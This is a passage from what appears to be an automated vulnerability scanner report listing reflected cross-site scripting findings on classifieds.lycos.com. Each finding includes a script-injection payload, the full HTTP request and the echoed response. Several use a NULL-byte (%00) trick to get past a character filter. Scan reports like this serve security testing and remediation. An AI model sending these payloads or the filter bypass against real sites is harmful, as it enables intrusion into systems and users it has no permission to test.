P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/fair-oaks-apartments-2416171997?218a8"><script>alert(1)</script>ab9259f54a3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.27. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a93"><script>alert(1)</script>09cea7d799e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment17a93"><script>alert(1)</script>09cea7d799e/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment17a93"><script>alert(1)</script>09cea7d799e/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320?mobile=1" rel="nofollow">
...[SNIP]...

1.28. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066cfc"><script>alert(1)</script>e742502d564 was submitted in the REST URL parameter 2. This input was echoed as 66cfc"><script>alert(1)</script>e742502d564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320%0066cfc"><script>alert(1)</script>e742502d564 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320%0066cfc"><script>alert(1)</script>e742502d564?mobile=1" rel="nofollow">
...[SNIP]...

1.29. http://classifieds.lycos.com/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9acf"><script>alert(1)</script>05ba2e375bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320?e9acf"><script>alert(1)</script>05ba2e375bd=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:06 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/
Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/quality-1-bed-w-heat-and-electric-incl-great-location-rent-specials-2416174320?e9acf"><script>alert(1)</script>05ba2e375bd=1&mobile=1" rel="nofollow">
...[SNIP]...

1.30. http://classifieds.lycos.com/housing-rent-commercial-office_space/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-commercial-office_space/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f0de"><script>alert(1)</script>e40a3a03cb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-commercial-office_space9f0de"><script>alert(1)</script>e40a3a03cb1/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:01 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-commercial-office_space9f0de"><script>alert(1)</script>e40a3a03cb1/?mobile=1" rel="nofollow">
...[SNIP]...

1.31. http://classifieds.lycos.com/housing-rent-commercial-office_space/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-commercial-office_space/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5c80"><script>alert(1)</script>36e8e54f4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-commercial-office_space/?c5c80"><script>alert(1)</script>36e8e54f4e2=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:10:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-commercial-office_space/?c5c80"><script>alert(1)</script>36e8e54f4e2=1&mobile=1" rel="nofollow">
...[SNIP]...

1.32. http://classifieds.lycos.com/housing-rent-condo/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-condo/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e8a"><script>alert(1)</script>00ac3d88a6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-condo13e8a"><script>alert(1)</script>00ac3d88a6d/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:53 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-condo13e8a"><script>alert(1)</script>00ac3d88a6d/?mobile=1" rel="nofollow">
...[SNIP]...

1.33. http://classifieds.lycos.com/housing-rent-condo/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-condo/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1e90"><script>alert(1)</script>362549775a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-condo/?c1e90"><script>alert(1)</script>362549775a0=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:08:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:11 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-condo/?c1e90"><script>alert(1)</script>362549775a0=1&mobile=1" rel="nofollow">
...[SNIP]...

1.34. http://classifieds.lycos.com/housing-rent-home/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bfc4"><script>alert(1)</script>7ad962eae44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-home2bfc4"><script>alert(1)</script>7ad962eae44/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-home2bfc4"><script>alert(1)</script>7ad962eae44/?mobile=1" rel="nofollow">
...[SNIP]...

1.35. http://classifieds.lycos.com/housing-rent-home/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8c7"><script>alert(1)</script>4cd20fa0ed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-home/?8a8c7"><script>alert(1)</script>4cd20fa0ed6=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-home/?8a8c7"><script>alert(1)</script>4cd20fa0ed6=1&mobile=1" rel="nofollow">
...[SNIP]...

1.36. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-home/fishhawk-ranch-2365223841

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce007"><script>alert(1)</script>b8ae2171e65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-homece007"><script>alert(1)</script>b8ae2171e65/fishhawk-ranch-2365223841 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-homece007"><script>alert(1)</script>b8ae2171e65/fishhawk-ranch-2365223841?mobile=1" rel="nofollow">
...[SNIP]...

1.37. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-home/fishhawk-ranch-2365223841

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00783cb"><script>alert(1)</script>bb6e81bb1b5 was submitted in the REST URL parameter 2. This input was echoed as 783cb"><script>alert(1)</script>bb6e81bb1b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-rent-home/fishhawk-ranch-2365223841%00783cb"><script>alert(1)</script>bb6e81bb1b5 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:53 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-home/fishhawk-ranch-2365223841%00783cb"><script>alert(1)</script>bb6e81bb1b5?mobile=1" rel="nofollow">
...[SNIP]...

1.38. http://classifieds.lycos.com/housing-rent-home/fishhawk-ranch-2365223841 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-home/fishhawk-ranch-2365223841

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7af7"><script>alert(1)</script>d3741c6c494 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-home/fishhawk-ranch-2365223841?a7af7"><script>alert(1)</script>d3741c6c494=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:29 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fhome; path=/
Set-Cookie: classifieds[lastpage][0][name]=Homes+for+Rent; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-home/fishhawk-ranch-2365223841?a7af7"><script>alert(1)</script>d3741c6c494=1&mobile=1" rel="nofollow">
...[SNIP]...

1.39. http://classifieds.lycos.com/housing-rent-roommates/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-roommates/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1cd5"><script>alert(1)</script>12f816493e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-roommatesc1cd5"><script>alert(1)</script>12f816493e0/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-roommatesc1cd5"><script>alert(1)</script>12f816493e0/?mobile=1" rel="nofollow">
...[SNIP]...

1.40. http://classifieds.lycos.com/housing-rent-roommates/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-roommates/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4386a"><script>alert(1)</script>53f51d5a76c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-roommates/?4386a"><script>alert(1)</script>53f51d5a76c=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:08:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:09 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56639

